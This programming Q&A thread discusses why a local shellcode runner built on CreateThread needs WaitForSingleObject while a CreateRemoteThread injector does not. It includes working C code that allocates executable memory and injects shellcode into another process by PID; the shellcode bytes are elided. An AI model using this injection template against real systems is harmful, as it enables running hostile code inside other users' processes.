# Thread Execution Differences Between CreateThread and CreateRemoteThread

Tags: c++, c, winapi, shellcode

I am trying to learn how to do process injections. First, I learn shellcode types in C/C++. However, I met a problem. One code is written by using CreateThread. That is okay but after CreateThread, I have to use WaitForSingleObject function to prevent thread from finishing immediately. Thus, the thread lasts until I exit.

First shellcode written by using CreateThread:

```
#include <Windows.h>

void main()
{
    const char shellcode[] = "\xfc\xe8\x82 (...) ";
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
    DWORD threadID;
    HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(hThread, INFINITE);
}
```

However, the real problem begins here. If I inject shellcode to another process, I use CreateRemoteThread but after this function I do not need to use WaitForSingleObject because it automatically lasts until I exit. I do not understand why I have to use WaitForSingleObject for CreateThread while I can write CreateRemoteThread without it seamlessly.

Second shellcode written by using CreateRemoteThread:

```
#include "stdafx.h"
#include "Windows.h"

int main(int argc, char *argv[])
{
    unsigned char shellcode[] = "\x48\x31\xc9\x48 (...) ";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    printf("Injecting to PID: %i", atoi(argv[1]));
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(processHandle);

    return 0;
}
```

I have tried to delete WaitForSingleObject but the shellcode written by using CreateThread did not work.

Comment: It's because when you do it in your own process, having nothing to do, it terminates before the thread gets a chance to run.

Comment: As far as the system goes, there is only `NtCreateRemoteThread`. `CreateThread` is merely a convenience implementation that passes a handle to the current process. If believe your code to exhibit different behavior depending on whether you call `CreateThread` or `CreateRemoteThread` then that is probably wrong. Either API does exactly the same thing.

Answer (score 1, accepted):

You've misunderstood what `WaitForSingleObject` on a thread is doing.  It isn't keeping alive the thread that you pass to it.  It is blocking the thread that makes the call.

When the `main()` thread returns, the runtime library calls `ExitProcess` which kills all other threads in the same process.  So you have to prevent reaching the end of `main()`, and a wait function inside does that.  But there are plenty of other ways that `main()` might keep running, for example creating a window and entering a `GetMessage`/`TranslateMessage`/`DispatchMessage` loop.

When you inject into a remote process, it normally has its own lifetime and your new thread is not at risk of being terminated.  Even though your injector returns from `main()`, only threads in the same process are killed off.

Comment: Ideally, you should still wait on a remote thread, so that you can cleanup everything you allocated for it in the remote process.  You don't want to be rude and leak everything that is in someone else's process (or, do you?...)

Comment: @RemyLebeau: You don't need to wait on the remote thread to do that.  Just code the injected payload to clean itself.

Comment: You could, though that is much harder to do when injecting raw shellcode that will have to make calls to external functions. Better to inject a DLL instead.